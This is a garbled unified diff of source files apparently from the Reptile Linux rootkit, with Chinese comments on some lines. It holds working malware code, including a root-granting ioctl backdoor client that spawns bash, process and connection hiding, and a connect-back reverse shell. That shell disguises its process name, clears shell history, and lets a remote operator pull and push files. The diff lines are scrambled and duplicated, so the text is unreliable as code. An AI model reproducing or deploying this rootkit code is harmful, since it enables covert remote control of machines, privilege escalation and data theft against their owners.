+	} else if (strcmp(prot, "icmp") == 0 || strcmp(prot, "ICMP") == 0) {
-    if (!data)
+		icmp(srcip, dstip, data, len);
-        fatal("malloc");
+	} else if (strcmp(prot, "udp") == 0 || strcmp(prot, "UDP") == 0) {
-
+		udp(srcip, dstip, srcport, dstport, data, len);
-    // 初始化数据
+	}
-    bzero(data, len);
+
-    snprintf(data, len, "%s %s %s", token, connect_back_host, connect_back_port);
+	free(data);
-    do_encrypt(data + strlen(token) + 1, crypt_len, KEY); // 加密数据
+	return EXIT_SUCCESS;
-
+}
    // 根据协议发送数据包
    if (strcmp(prot, "tcp") == 0 || strcmp(prot, "TCP") == 0) {
        tcp(srcip, dstip, srcport, dstport, data, len);
    }
    else if (strcmp(prot, "icmp") == 0 || strcmp(prot, "ICMP") == 0) {
        icmp(srcip, dstip, data, len);
    }
    else if (strcmp(prot, "udp") == 0 || strcmp(prot, "UDP") == 0) {
        udp(srcip, dstip, srcport, dstport, data, len);
    }
    // 释放内存
    free(data);
    return EXIT_SUCCESS; // 返回成功
 }
--- a/src/Reptile/userland/cmd.c
+++ b/src/Reptile/userland/cmd.c
@ -10,210 +10,178 @@
 #include <sys/types.h>
 #include <unistd.h>
 // 定义默认的shell路径
 #define SHELL "/bin/bash"
 /**
 * @brief 控制结构体，用于存储命令和参数
 */
 struct control {
-    unsigned short cmd; // 命令类型
+	unsigned short cmd;
-    void *argv;         // 命令参数
+	void *argv;
 };
 /**
 * @brief 主函数，程序入口
 * @param argc 参数个数
 * @param argv 参数列表
 * @return int 返回状态码
 */
 int main(int argc, char **argv)
 {
-    int sockfd; // 套接字文件描述符
+	int sockfd;
-    struct control args; // 控制结构体实例
+	struct control args;
-    struct sockaddr_in addr; // 地址结构体实例
+	struct sockaddr_in addr;
-    struct hostent *host; // 主机信息结构体指针
+	struct hostent *host;
-    unsigned int pid; // 进程ID
+	unsigned int pid;
-    char *bash = SHELL; // shell路径
+	char *bash = SHELL;
-    char *envp[1] = {NULL}; // 环境变量数组
+	char *envp[1] = {NULL};
-    char *arg[3] = {SHELL, NULL}; // 执行shell的命令参数
+	char *arg[3] = {SHELL, NULL};
-
+
-    // 如果参数少于2个，退出程序
+	if (argc < 2)
-    if (argc < 2)
+		exit(0);
-        exit(0);
+
-
+	sockfd = socket(AF_INET, SOCK_STREAM, 6);
-    // 创建TCP套接字
+	if (sockfd < 0)
-    sockfd = socket(AF_INET, SOCK_STREAM, 6);
+		goto fail;
-    if (sockfd < 0)
+
-        goto fail; // 如果创建失败，跳转到fail标签
+	if (strcmp(argv[1], "root") == 0) {
-
+		if (geteuid() == 0) {
-    // 如果第一个参数是"root"
+			printf("You are already root! :)\n\n");
-    if (strcmp(argv[1], "root") == 0) {
+			close(sockfd);
-        // 如果已经是root用户，提示并关闭套接字后退出
+			goto out;
-        if (geteuid() == 0) {
+		}
-            printf("You are already root! :)\n\n");
+
-            close(sockfd);
+		args.cmd = 3;
-            goto out;
+
-        }
+		if (ioctl(sockfd, AUTH, HTUA) == 0) {
-
+			ioctl(sockfd, AUTH, &args);
-        args.cmd = 3; // 设置命令为3
+			ioctl(sockfd, AUTH, HTUA);
-
+		}
-        // 通过ioctl系统调用进行身份验证
+
-        if (ioctl(sockfd, AUTH, HTUA) == 0) {
+		if (geteuid() == 0) {
-            ioctl(sockfd, AUTH, &args);
+			printf("\e[01;36mYou got super powers!\e[00m\n\n");
-            ioctl(sockfd, AUTH, HTUA);
+			execve(bash, arg, envp);
-        }
+		} else {
-
+			printf("\e[00;31mYou have no power here! :( \e[00m\n\n");
-        // 如果成功获取root权限，执行shell；否则提示无权限
+		}
-        if (geteuid() == 0) {
+
-            printf("\e[01;36mYou got super powers!\e[00m\n\n");
+		goto out;
-            execve(bash, arg, envp);
+	}
-        } else {
+
-            printf("\e[00;31mYou have no power here! :( \e[00m\n\n");
+	if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) {
-        }
+		if (argc < 2)
-
+			goto fail;
-        goto out; // 跳转到out标签
+
-    }
+		if (argc == 2) {
-
+			args.cmd = 0;
-    // 如果第一个参数是"hide"或"show"
+
-    if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) {
+			if (ioctl(sockfd, AUTH, HTUA) == 0) {
-        // 如果参数少于2个，跳转到fail标签
+				if (ioctl(sockfd, AUTH, &args) == 0) {
-        if (argc < 2)
+					if (ioctl(sockfd, AUTH, HTUA) == 0) {
-            goto fail;
+						printf("\e[01;32mSuccess!\e[00m\n");
-
+						goto out;
-        // 如果只有一个参数，隐藏或显示所有连接
+					}
-        if (argc == 2) {
+				}
-            args.cmd = 0; // 设置命令为0
+			}
-
+		} else {
-            // 通过ioctl系统调用进行身份验证
+
-            if (ioctl(sockfd, AUTH, HTUA) == 0) {
+			args.cmd = 1;
-                if (ioctl(sockfd, AUTH, &args) == 0) {
+			pid = (unsigned int)atoi(argv[2]);
-                    if (ioctl(sockfd, AUTH, HTUA) == 0) {
+			args.argv = &pid;
-                        printf("\e[01;32mSuccess!\e[00m\n");
+
-                        goto out; // 成功后跳转到out标签
+			if (ioctl(sockfd, AUTH, HTUA) == 0) {
-                    }
+				if (ioctl(sockfd, AUTH, &args) == 0) {
-                }
+					if (ioctl(sockfd, AUTH, HTUA) == 0) {
-            }
+						printf("\e[01;32mSuccess!\e[00m\n");
-        } else { // 如果有两个参数，隐藏或显示指定PID的连接
+						goto out;
-            args.cmd = 1; // 设置命令为1
+					}
-            pid = (unsigned int)atoi(argv[2]); // 将第二个参数转换为PID
+				}
-            args.argv = &pid; // 设置命令参数为PID
+			}
-
+		}
-            // 通过ioctl系统调用进行身份验证
+	}
-            if (ioctl(sockfd, AUTH, HTUA) == 0) {
+
-                if (ioctl(sockfd, AUTH, &args) == 0) {
+	if (strcmp(argv[1], "file-tampering") == 0) {
-                    if (ioctl(sockfd, AUTH, HTUA) == 0) {
+		args.cmd = 2;
-                        printf("\e[01;32mSuccess!\e[00m\n");
+
-                        goto out; // 成功后跳转到out标签
+		if (ioctl(sockfd, AUTH, HTUA) == 0) {
-                    }
+			if (ioctl(sockfd, AUTH, &args) == 0) {
-                }
+				if (ioctl(sockfd, AUTH, HTUA) == 0) {
-            }
+					printf("\e[01;32mSuccess!\e[00m\n");
-        }
+					goto out;
-    }
+				}
-
+			}
-    // 如果第一个参数是"file-tampering"
+		}
-    if (strcmp(argv[1], "file-tampering") == 0) {
+	}
-        args.cmd = 2; // 设置命令为2
+
-
+	if (strcmp(argv[1], "conn") == 0) {
-        // 通过ioctl系统调用进行身份验证
+		if (argc < 4)
-        if (ioctl(sockfd, AUTH, HTUA) == 0) {
+			goto fail;
-            if (ioctl(sockfd, AUTH, &args) == 0) {
+
-                if (ioctl(sockfd, AUTH, HTUA) == 0) {
+		if (strcmp(argv[4], "hide") == 0) {
-                    printf("\e[01;32mSuccess!\e[00m\n");
+			args.cmd = 4;
-                    goto out; // 成功后跳转到out标签
+		} else if (strcmp(argv[4], "show") == 0) {
-                }
+			args.cmd = 5;
-            }
+		} else {
-        }
+			goto fail;
-    }
+		}
-
+
-    // 如果第一个参数是"conn"
+		host = gethostbyname(argv[2]);
-    if (strcmp(argv[1], "conn") == 0) {
+
-        // 如果参数少于4个，跳转到fail标签
+		if (host == NULL)
-        if (argc < 4)
+			goto fail;
-            goto fail;
+
-
+		memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
-        // 根据第四个参数设置命令为4（hide）或5（show）
+		       host->h_length);
-        if (strcmp(argv[4], "hide") == 0) {
+
-            args.cmd = 4; // 设置命令为4
+		addr.sin_family = AF_INET;
-        } else if (strcmp(argv[4], "show") == 0) {
+		addr.sin_port = htons(atoi(argv[3]));
-            args.cmd = 5; // 设置命令为5
+
-        } else {
+		args.argv = &addr;
-            goto fail; // 如果第四个参数不是"hide"或"show"，跳转到fail标签
+
-        }
+		if (ioctl(sockfd, AUTH, HTUA) == 0) {
-
+			if (ioctl(sockfd, AUTH, &args) == 0) {
-        // 获取主机信息
+				if (ioctl(sockfd, AUTH, HTUA) == 0) {
-        host = gethostbyname(argv[2]);
+					printf("\e[01;32mSuccess!\e[00m\n");
-        if (host == NULL)
+					goto out;
-            goto fail; // 如果获取主机信息失败，跳转到fail标签
+				}
-
+			}
-        // 复制主机地址到地址结构体中
+		}
-        memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
+	}
        addr.sin_family = AF_INET; // 设置地址族为IPv4
        addr.sin_port = htons(atoi(argv[3])); // 设置端口号
        args.argv = &addr; // 设置命令参数为地址结构体指针
        // 通过ioctl系统调用进行身份验证
        if (ioctl(sockfd, AUTH, HTUA) == 0) {
            if (ioctl(sockfd, AUTH, &args) == 0) {
                if (ioctl(sockfd, AUTH, HTUA) == 0) {
                    printf("\e[01;32mSuccess!\e[00m\n");
                    goto out; // 成功后跳转到out标签
                }
            }
        }
    }
 /*
-    这部分代码被注释掉了。它处理UDP协议的连接隐藏和显示功能。与上面的TCP部分类似，但使用不同的命令和端口。
+
-    if (strcmp(argv[1], "udp") == 0) {
+// This part is deprecated. There is no reason to hide specific protocols
-        if (argc < 4)
+// when you want to hide some connection, in the most of cases you will 
-            goto fail;
+// need to hide every connection and everything about your attacker server.
-        if (strcmp(argv[4], "hide") == 0) {
+
-            args.cmd = 6;
+	if (strcmp(argv[1], "udp") == 0) {
-        } else if (strcmp(argv[4], "show") == 0) {
+		if (argc < 4)
-            args.cmd = 7;
+			goto fail;
-        } else {
+
-            goto fail;
+		if (strcmp(argv[4], "hide") == 0) {
-        }
+			args.cmd = 6;
-        host = gethostbyname(argv[2]);
+		} else if (strcmp(argv[4], "show") == 0) {
-        if (host == NULL)
+			args.cmd = 7;
-            goto fail;
+		} else {
-        memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
+			goto fail;
-        addr.sin_family = AF_INET;
+		}
-        addr.sin_port = htons(atoi(argv[3]));
+
-        args.argv = &addr;
+		host = gethostbyname(argv[2]);
-        if (ioctl(sockfd, AUTH, HTUA) == 0) {
+
-            if (ioctl(sockfd, AUTH, &args) == 0) {
+		if (host == NULL)
-                if (ioctl(sockfd, AUTH, HTUA) == 0) {
+			goto fail;
-                    printf("\e[01;32mSuccess!\e[00m\n");
+
-                    goto out;
+		memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
-                }
+		       host->h_length);
-            }
+
-        }
+		addr.sin_family = AF_INET;
-    }*/
+		addr.sin_port = htons(atoi(argv[3]));
-    if (strcmp(argv[1], "keysniffer") == 0) {
+
-        if (argc < 3)
+		args.argv = &addr;
-            goto fail;
+
-
+		if (ioctl(sockfd, AUTH, HTUA) == 0) {
-        if (strcmp(argv[2], "start") == 0) {
+			if (ioctl(sockfd, AUTH, &args) == 0) {
-            args.cmd = 6; // 假设6是启动keysniffer的命令
+				if (ioctl(sockfd, AUTH, HTUA) == 0) {
-        } else if (strcmp(argv[2], "stop") == 0) {
+					printf("\e[01;32mSuccess!\e[00m\n");
-            args.cmd = 7; // 假设7是停止keysniffer的命令
+					goto out;
-        } else {
+				}
-            goto fail;
+			}
-        }
+		}
-
+	}
-        if (ioctl(sockfd, AUTH, HTUA) == 0) {
+*/
-            if (ioctl(sockfd, AUTH, &args) == 0) {
+fail:
-                if (ioctl(sockfd, AUTH, HTUA) == 0) {
+	printf("\e[01;31mFailed!\e[00m\n");
-                    printf("\e[01;32mSuccess!\e[00m\n");
+out:
-                    goto out;
+	close(sockfd);
-                }
+	return 0;
-            }
+}
        }
    }
 fail: // fail标签，打印失败信息并关闭套接字
    printf("\e[01;31mFailed!\e[00m\n");
 out: // out标签，关闭套接字并返回0表示程序结束
    close(sockfd); // 关闭套接字文件描述符
    return 0; // 返回0表示程序正常结束
 }
--- a/src/Reptile/userland/shell.c
+++ b/src/Reptile/userland/shell.c
@ -15,7 +15,7 @@
 #include "config.h"
 #include "pel.h"
-#define ERROR -1
+#define ERROR 		-1
 unsigned char message[BUFSIZE + 1];
 extern char *optarg;
@ -23,239 +23,224 @@ char *rcfile;
 #ifndef _REPTILE_
 // 打印使用说明
 void usage(char *argv0)
 {
-    fprintf(stderr, "Usage: %s [ -t connect_back_host ] ", argv0);
+	fprintf(stderr, "Usage: %s [ -t connect_back_host ] ", argv0);
-    fprintf(stderr, "[ -p port ] [ -s secret ] [ -r delay (optional) ]\n");
+	fprintf(stderr, "[ -p port ] [ -s secret ] [ -r delay (optional) ]\n");
 }
 #endif
 // 获取文件
 int get_file(int client)
 {
-    int ret, len, fd;
+	int ret, len, fd;
-    // 接收文件名
+	ret = pel_recv_msg(client, message, &len);
    ret = pel_recv_msg(client, message, &len);
-    if (ret != PEL_SUCCESS)
+	if (ret != PEL_SUCCESS)
-        return (ERROR);
+		return (ERROR);
-    if (message[0] == OUT)
+	if (message[0] == OUT)
-        return 1;
+		return 1;
-    message[len] = '\0';
+	message[len] = '\0';
-    // 打开文件
+	fd = open((char *)message, O_RDONLY);
    fd = open((char *)message, O_RDONLY);
-    if (fd < 0)
+	if (fd < 0)
-        return (ERROR);
+		return (ERROR);
-    // 读取文件内容并发送
+	while (1) {
-    while (1) {
+		len = read(fd, message, BUFSIZE);
        len = read(fd, message, BUFSIZE);
-        if (len == 0)
+		if (len == 0)
-            break;
+			break;
-        if (len < 0)
+		if (len < 0)
-            return (ERROR);
+			return (ERROR);
-        ret = pel_send_msg(client, message, len);
+		ret = pel_send_msg(client, message, len);
-        if (ret != PEL_SUCCESS)
+		if (ret != PEL_SUCCESS)
-            return (ERROR);
+			return (ERROR);
-    }
+	}
-    return 0;
+	return 0;
 }
 // 上传文件
 int put_file(int client)
 {
-    int ret, len, fd;
+	int ret, len, fd;
-    // 接收文件名
+	ret = pel_recv_msg(client, message, &len);
    ret = pel_recv_msg(client, message, &len);
-    if (ret != PEL_SUCCESS)
+	if (ret != PEL_SUCCESS)
-        return (ERROR);
+		return (ERROR);
-    if (message[0] == OUT)
+	if (message[0] == OUT)
-        return (ERROR);
+		return (ERROR);
-    message[len] = '\0';
+	message[len] = '\0';
-    fd = creat((char *)message, 0644);
+	fd = creat((char *)message, 0644);
-    if (fd < 0)
+	if (fd < 0)
-        return (ERROR);
+		return (ERROR);
-    // 接收文件内容并写入
+	while (1) {
-    while (1) {
+		ret = pel_recv_msg(client, message, &len);
        ret = pel_recv_msg(client, message, &len);
-        if (ret != PEL_SUCCESS)
+		if (ret != PEL_SUCCESS)
-            return (ERROR);
+			return (ERROR);
-        if (strncmp((char *)message, EXIT, EXIT_LEN) == 0)
+		if (strncmp((char *)message, EXIT, EXIT_LEN) == 0)
-            break;
+			break;
-        if (write(fd, message, len) != len)
+		if (write(fd, message, len) != len)
-            return (ERROR);
+			return (ERROR);
-    }
+	}
-    return 0;
+	return 0;
 }
 // 运行 shell
 int runshell(int client)
 {
-    fd_set rd;
+	fd_set rd;
-    struct winsize ws;
+	struct winsize ws;
-    char *slave, *temp, *shell;
+	char *slave, *temp, *shell;
-    int ret, len, pid, pty, tty, n;
+	int ret, len, pid, pty, tty, n;
-    // 打开伪终端
+	if (openpty(&pty, &tty, NULL, NULL, NULL) < 0)
-    if (openpty(&pty, &tty, NULL, NULL, NULL) < 0)
+		return (ERROR);
        return (ERROR);
-    slave = ttyname(tty);
+	slave = ttyname(tty);
-    if (slave == NULL)
+	if (slave == NULL)
-        return (ERROR);
+		return (ERROR);
-    chdir(HOMEDIR);
+	chdir(HOMEDIR);
-    putenv("HISTFILE=");
+	putenv("HISTFILE=");
-    // 接收终端类型
+	ret = pel_recv_msg(client, message, &len);
    ret = pel_recv_msg(client, message, &len);
-    if (ret != PEL_SUCCESS)
+	if (ret != PEL_SUCCESS)
-        return (ERROR);
+		return (ERROR);
-    message[len] = '\0';
+	message[len] = '\0';
-    setenv("TERM", (char *)message, 1);
+	setenv("TERM", (char *)message, 1);
-    // 接收窗口大小
+	ret = pel_recv_msg(client, message, &len);
    ret = pel_recv_msg(client, message, &len);
-    if (ret != PEL_SUCCESS || len != 4)
+	if (ret != PEL_SUCCESS || len != 4)
-        return (ERROR);
+		return (ERROR);
-    ws.ws_row = ((int)message[0] << 8) + (int)message[1];
+	ws.ws_row = ((int)message[0] << 8) + (int)message[1];
-    ws.ws_col = ((int)message[2] << 8) + (int)message[3];
+	ws.ws_col = ((int)message[2] << 8) + (int)message[3];
-    ws.ws_xpixel = 0;
+	ws.ws_xpixel = 0;
-    ws.ws_ypixel = 0;
+	ws.ws_ypixel = 0;
-    if (ioctl(pty, TIOCSWINSZ, &ws) < 0)
+	if (ioctl(pty, TIOCSWINSZ, &ws) < 0)
-        return (ERROR);
+		return (ERROR);
-    // 接收命令
+	ret = pel_recv_msg(client, message, &len);
    ret = pel_recv_msg(client, message, &len);
-    if (ret != PEL_SUCCESS)
+	if (ret != PEL_SUCCESS)
-        return (ERROR);
+		return (ERROR);
-    if (len == 1 && message[0] == RUNSHELL) {
+	if (len == 1 && message[0] == RUNSHELL) {
-        temp = (char *)malloc(20 + strlen(rcfile));
+		temp = (char *)malloc(20 + strlen(rcfile));
-        if (temp == NULL)
+		if (temp == NULL)
-            return (ERROR);
+			return (ERROR);
-        strcpy(temp, "exec bash --rcfile ");
+		strcpy(temp, "exec bash --rcfile ");
-        strcat(temp, rcfile);
+		strcat(temp, rcfile);
-    } else {
+	} else {
-        message[len] = '\0';
+		message[len] = '\0';
-        temp = (char *)malloc(len + 1);
+		temp = (char *)malloc(len + 1);
-        if (temp == NULL)
+		if (temp == NULL)
-            return (ERROR);
+			return (ERROR);
-        strncpy(temp, (char *)message, len + 1);
+		strncpy(temp, (char *)message, len + 1);
-    }
+	}
-    // 创建子进程
+	pid = fork();
    pid = fork();
-    if (pid < 0) {
+	if (pid < 0) {
-        free(temp);
+		free(temp);
-        return (ERROR);
+		return (ERROR);
-    }
+	}
-    if (pid == 0) {
+	if (pid == 0) {
-        close(client);
+		close(client);
-        close(pty);
+		close(pty);
-        if (setsid() < 0) {
+		if (setsid() < 0) {
-            free(temp);
+			free(temp);
-            return (ERROR);
+			return (ERROR);
-        }
+		}
-        if (ioctl(tty, TIOCSCTTY, NULL) < 0) {
+		if (ioctl(tty, TIOCSCTTY, NULL) < 0) {
-            free(temp);
+			free(temp);
-            return (ERROR);
+			return (ERROR);
-        }
+		}
-        dup2(tty, 0);
+		dup2(tty, 0);
-        dup2(tty, 1);
+		dup2(tty, 1);
-        dup2(tty, 2);
+		dup2(tty, 2);
-        if (tty > 2)
+		if (tty > 2)
-            close(tty);
+			close(tty);
-        shell = (char *)malloc(10);
+		shell = (char *)malloc(10);
-        if (shell == NULL) {
+		if (shell == NULL) {
-            free(temp);
+			free(temp);
-            return (ERROR);
+			return (ERROR);
-        }
+		}
-        strcpy(shell, "/bin/bash");
+		strcpy(shell, "/bin/bash");
-        execl(shell, shell + 5, "-c", temp, (char *)0);
+		execl(shell, shell + 5, "-c", temp, (char *)0);
-        free(temp);
+		free(temp);
-        free(shell);
+		free(shell);
-        return 0;
+		return 0;
-    } else {
+	} else {
-        close(tty);
+		close(tty);
-        // 处理数据传输
+		while (1) {
-        while (1) {
+			FD_ZERO(&rd);
-            FD_ZERO(&rd);
+			FD_SET(client, &rd);
-            FD_SET(client, &rd);
+			FD_SET(pty, &rd);
            FD_SET(pty, &rd);
-            n = (pty > client) ? pty : client;
+			n = (pty > client) ? pty : client;
-            if (select(n + 1, &rd, NULL, NULL, NULL) < 0)
+			if (select(n + 1, &rd, NULL, NULL, NULL) < 0)
-                return (ERROR);
+				return (ERROR);
-            if (FD_ISSET(client, &rd)) {
+			if (FD_ISSET(client, &rd)) {
-                ret = pel_recv_msg(client, message, &len);
+				ret = pel_recv_msg(client, message, &len);
-                if (ret != PEL_SUCCESS)
+				if (ret != PEL_SUCCESS)
-                    return (ERROR);
+					return (ERROR);
-                if (write(pty, message, len) != len)
+				if (write(pty, message, len) != len)
-                    return (ERROR);
+					return (ERROR);
-            }
+			}
-            if (FD_ISSET(pty, &rd)) {
+			if (FD_ISSET(pty, &rd)) {
-                len = read(pty, message, BUFSIZE);
+				len = read(pty, message, BUFSIZE);
-                if (len == 0)
+				if (len == 0)
-                    break;
+					break;
-                if (len < 0)
+				if (len < 0)
-                    return (ERROR);
+					return (ERROR);
-                ret = pel_send_msg(client, message, len);
+				ret = pel_send_msg(client, message, len);
-                if (ret != PEL_SUCCESS)
+				if (ret != PEL_SUCCESS)
-                    return (ERROR);
+					return (ERROR);
-            }
+			}
-        }
+		}
-        return 0;
+		return 0;
-    }
+	}
 }
 #ifdef _REPTILE_
@ -264,265 +249,247 @@ int runshell(int client)
 #define UNHIDE 0
 struct control {
-    unsigned short cmd;
+	unsigned short cmd;
-    void *argv;
+	void *argv;
 };
 // 隐藏连接
 void hide_conn(struct sockaddr_in addr, int hide)
 {
-    struct control args;
+	struct control args;
-    int sockioctl = socket(AF_INET, SOCK_STREAM, 6);
+	int sockioctl = socket(AF_INET, SOCK_STREAM, 6);
-    if (sockioctl < 0)
+	if (sockioctl < 0)
-        exit(1);
+		exit(1);
-    if (hide) {
+	if (hide) {
-        args.cmd = 4;
+		args.cmd = 4;
-    } else {
+	} else {
-        args.cmd = 5;
+		args.cmd = 5;
-    }
+	}
-    args.argv = &addr;
+	args.argv = &addr;
-    if (ioctl(sockioctl, AUTH, HTUA) == 0) {
+	if (ioctl(sockioctl, AUTH, HTUA) == 0) {
-        if (ioctl(sockioctl, AUTH, &args) == 0)
+		if (ioctl(sockioctl, AUTH, &args) == 0)
-            ioctl(sockioctl, AUTH, HTUA);
+			ioctl(sockioctl, AUTH, HTUA);
-    }
+	}
-    close(sockioctl);
+	close(sockioctl);
 }
 #endif
 // 构建 rcfile 路径
 int build_rcfile_path(void)
 {
-    char *name = NAME;
+	char *name = NAME;
-    int len = 6 + strlen(name) + strlen(name);
+	int len = 6 + strlen(name) + strlen(name);
-    rcfile = (char *)malloc(len);
+	rcfile = (char *)malloc(len);
-    if (rcfile == NULL)
+	if (rcfile == NULL)
-        return -1;
+		return -1;
-    snprintf(rcfile, len, "/%s/%s_rc", name, name);
+	snprintf(rcfile, len, "/%s/%s_rc", name, name);
-    return 0;
+	return 0;
 }
 int main(int argc, char **argv)
 {
-    int ret, len, pid, opt, client, arg0_len, delay = 0;
+	int ret, len, pid, opt, client, arg0_len, delay = 0;
-    short int connect_back_port = 0;
+	short int connect_back_port = 0;
-    char *connect_back_host = NULL;
+	char *connect_back_host = NULL;
-    char *secret = NULL;
+	char *secret = NULL;
-    struct sockaddr_in client_addr;
+	struct sockaddr_in client_addr;
-    struct hostent *client_host;
+	struct hostent *client_host;
-    socklen_t n;
+	socklen_t n;
-
+
-    // 解析命令行参数
+	while ((opt = getopt(argc, argv, "t:s:p:r:")) != -1) {
-    while ((opt = getopt(argc, argv, "t:s:p:r:")) != -1) {
+		switch (opt) {
-        switch (opt) {
+		case 't':
-        case 't':
+			connect_back_host = strdup(optarg);
-            connect_back_host = strdup(optarg);
+			break;
-            break;
+		case 'p':
-        case 'p':
+			connect_back_port = atoi(optarg);
-            connect_back_port = atoi(optarg);
+			if (!connect_back_port) {
            if (!connect_back_port) {
 #ifndef _REPTILE_
-                usage(*argv);        
+				usage(*argv);		
 #endif
-                goto out;
+				goto out;
-            }
+			}
-            break;
+			break;
-        case 's':
+		case 's':
-            secret = strdup(optarg);
+			secret = strdup(optarg);
-            break;
+			break;
-        case 'r':
+		case 'r':
-            delay = atoi(optarg);
+			delay = atoi(optarg);
-            break;
+			break;
-        default:
+		default:
 #ifndef _REPTILE_
-            usage(*argv);        
+			usage(*argv);		
 #endif
-            exit(1);
+			exit(1);
-            break;
+			break;
-        }
+		}
-    }
+	}
-    if (connect_back_host == NULL || connect_back_port == 0 ||
+	if (connect_back_host == NULL || connect_back_port == 0 ||
-        secret == NULL) {
+	    secret == NULL) {
 #ifndef _REPTILE_
-        usage(*argv);        
+		usage(*argv);		
 #endif
-        goto out;
+		goto out;
-    }
+	}
-
+
-    // 隐藏进程名称
+	arg0_len = strlen(argv[0]);
-    arg0_len = strlen(argv[0]);
+	bzero(argv[0], arg0_len);
-    bzero(argv[0], arg0_len);
+	
-    
+	if (arg0_len >= 7)
-    if (arg0_len >= 7)
+		strcpy(argv[0], "[ata/0]");
-        strcpy(argv[0], "[ata/0]");
+
-
+	if(argv[1])
-    if(argv[1])
+		bzero(argv[1], strlen(argv[1]));
-        bzero(argv[1], strlen(argv[1]));
+	
-    
+	if(argv[2])
-    if(argv[2])
+		bzero(argv[2], strlen(argv[2]));
-        bzero(argv[2], strlen(argv[2]));
+	
-    
+	if(argv[3])
-    if(argv[3])
+		bzero(argv[3], strlen(argv[3]));
-        bzero(argv[3], strlen(argv[3]));
+	
-    
+	if(argv[4])
-    if(argv[4])
+		bzero(argv[4], strlen(argv[4]));
-        bzero(argv[4], strlen(argv[4]));
+	
-    
+	if(argv[5])
-    if(argv[5])
+		bzero(argv[5], strlen(argv[5]));
-        bzero(argv[5], strlen(argv[5]));
+	
-    
+	if(argv[6])
-    if(argv[6])
+		bzero(argv[6], strlen(argv[6]));
-        bzero(argv[6], strlen(argv[6]));
+	
-    
+	if(argv[7])
-    if(argv[7])
+		bzero(argv[7], strlen(argv[7]));
-        bzero(argv[7], strlen(argv[7]));
+	
-    
+	if(argv[8])
-    if(argv[8])
+		bzero(argv[8], strlen(argv[8]));
-        bzero(argv[8], strlen(argv[8]));
+
-
+	if (build_rcfile_path())
-    if (build_rcfile_path())
+		goto out;
-        goto out;
+
-
+	pid = fork();
-    // 创建子进程
+
-    pid = fork();
+	if (pid < 0)
-
+		return (ERROR);
-    if (pid < 0)
+
-        return (ERROR);
+	if (pid != 0)
-
+		return 0;
-    if (pid != 0)
+
-        return 0;
+	if (setsid() < 0)
-
+		return (ERROR);
-    if (setsid() < 0)
+
-        return (ERROR);
+	for (n = 0; n < 1024; n++)
-
+		close(n);
-    for (n = 0; n < 1024; n++)
+
-        close(n);
+	do {
-
+		if (delay > 0)
-    do {
+			sleep(delay);
-        if (delay > 0)
+
-            sleep(delay);
+		client = socket(PF_INET, SOCK_STREAM, 0);
-
+		if (client < 0)
-        client = socket(PF_INET, SOCK_STREAM, 0);
+			continue;
-        if (client < 0)
+
-            continue;
+		client_host = gethostbyname(connect_back_host);
-
+		if (client_host == NULL)
-        client_host = gethostbyname(connect_back_host);
+			continue;
-        if (client_host == NULL)
+
-            continue;
+		memcpy((void *)&client_addr.sin_addr,
-
+		       (void *)client_host->h_addr, client_host->h_length);
-        memcpy((void *)&client_addr.sin_addr,
+
-               (void *)client_host->h_addr, client_host->h_length);
+		client_addr.sin_family = AF_INET;
-
+		client_addr.sin_port = htons(connect_back_port);
-        client_addr.sin_family = AF_INET;
+
-        client_addr.sin_port = htons(connect_back_port);
+		ret = connect(client, (struct sockaddr *)&client_addr,
-
+			      sizeof(client_addr));
-        ret = connect(client, (struct sockaddr *)&client_addr,
+
-                  sizeof(client_addr));
+		if (ret < 0) {
-
+			close(client);
-        if (ret < 0) {
+			continue;
-            close(client);
+		}
            continue;
        }
 #ifdef _REPTILE_
-        hide_conn(client_addr, HIDE);
+		hide_conn(client_addr, HIDE);
 #endif
-        ret = pel_server_init(client, secret);
+		ret = pel_server_init(client, secret);
-        if (ret != PEL_SUCCESS) {
+		if (ret != PEL_SUCCESS) {
-            shutdown(client, 2);
+			shutdown(client, 2);
 #ifdef _REPTILE_
-            hide_conn(client_addr, UNHIDE);
+			hide_conn(client_addr, UNHIDE);
 #endif
-            continue;
+			continue;
-        }
+		}
-
+
-    connect:
+	connect:
-
+
-        ret = pel_recv_msg(client, message, &len);
+		ret = pel_recv_msg(client, message, &len);
-
+
-        if (ret == PEL_SUCCESS || len == 1) {
+		if (ret == PEL_SUCCESS || len == 1) {
-            if (strcmp((char *)message, EXIT) == 0)
+			if (strcmp((char *)message, EXIT) == 0)
-                goto end;
+				goto end;
-
+
-            switch (message[0]) {
+			switch (message[0]) {
-            case GET_FILE:
+			case GET_FILE:
-                ret = get_file(client);
+				ret = get_file(client);
-
+
-                if (ret)
+				if (ret)
-                    goto connect;
+					goto connect;
-
+
-                if (pel_send_msg(client, (unsigned char *)EXIT,
+				if (pel_send_msg(client, (unsigned char *)EXIT,
-                         EXIT_LEN) != PEL_SUCCESS)
+						 EXIT_LEN) != PEL_SUCCESS)
-                    goto end;
+					goto end;
-
+
-                goto connect;
+				goto connect;
-            case PUT_FILE:
+			case PUT_FILE:
-                put_file(client);
+				put_file(client);
-                goto connect;
+				goto connect;
-            case RUNSHELL:
+			case RUNSHELL:
-                runshell(client);
+				runshell(client);
-                if (pel_send_msg(client, (unsigned char *)EXIT,
+				if (pel_send_msg(client, (unsigned char *)EXIT,
-                         EXIT_LEN) != PEL_SUCCESS)
+						 EXIT_LEN) != PEL_SUCCESS)
-                    goto end;
+					goto end;
-
+
-                goto connect;
+				goto connect;
-            case SET_DELAY:
+			case SET_DELAY:
-                if (pel_recv_msg(client, message, &len) !=
+				if (pel_recv_msg(client, message, &len) !=
-                    PEL_SUCCESS)
+				    PEL_SUCCESS)
-                    goto end;
+					goto end;
-
+
-                if (message[0] == 5)
+				if (message[0] == 5)
-                    goto connect;
+					goto connect;
-
+
-                message[len] = '\0';
+				message[len] = '\0';
-                delay = atoi((char *)message);
+				delay = atoi((char *)message);
-
+
-                goto connect;
+				goto connect;
-            case 'K': // 添加 keysniffer 命令处理
+			default:
-                if (pel_recv_msg(client, message, &len) != PEL_SUCCESS)
+				break;
-                    goto end;
+			}
-                if (strcmp((char *)message, "start") == 0) {
+		}
-                    start_keysniffer();
+	end:
-                } 
+		shutdown(client, 2);
                else if (strcmp((char *)message, "stop") == 0) {
                    stop_keysniffer();
                }
